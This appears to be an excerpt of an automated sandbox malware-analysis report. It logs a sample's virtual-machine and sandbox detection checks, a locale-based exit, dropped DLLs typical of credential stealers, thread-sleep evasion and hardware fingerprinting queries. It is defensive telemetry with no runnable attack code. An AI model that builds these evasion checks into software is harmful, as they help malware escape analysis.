Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_1-95166

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 173F2300000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 173F3D00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 16B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3110000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1510000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3270000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3070000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 3219
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 6402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4936
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	Window / User API: threadDelayed 4676
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	Window / User API: threadDelayed 5322

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-39238

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cqecfsbe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u42w.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	API coverage: 1.7 %

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 1528	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7232	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -51305s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -59844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -59735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -32253s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -59610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -34891s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -59463s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -59321s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -59201s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -48913s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -59087s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -40210s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -58976s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -50915s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -58860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -58734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -58611s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -58497s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -58387s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -58275s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -47902s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -58163s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -39526s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -58051s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -57941s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -56661s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -57829s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -49766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -57718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -35830s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -57606s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -57493s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -43265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -57381s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -55387s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -57267s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -40637s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -57117s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -31819s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -56992s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -49549s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -56887s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -56766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -56328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -56547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -46596s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -56393s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -56259s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -32008s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -56151s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -38067s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -56042s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -55924s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -31695s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -55817s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -34264s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -55636s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -34058s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -58670s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -55529s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -55400s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -55295s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -31647s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -55183s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -55071s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -54945s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -51976s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -54832s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -34549s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -45915s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -54719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -54609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -55255s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -54498s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -54387s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -33199s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -54275s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -54163s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -54052s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -43277s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -47778s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -53939s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -53822s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -53716s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068	Thread sleep time: -53604s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892	Thread sleep time: -38506s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe TID: 8132	Thread sleep count: 4676 > 30
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe TID: 8132	Thread sleep time: -3324636s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe TID: 8132	Thread sleep count: 5322 > 30
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe TID: 8132	Thread sleep time: -3783942s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2812	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

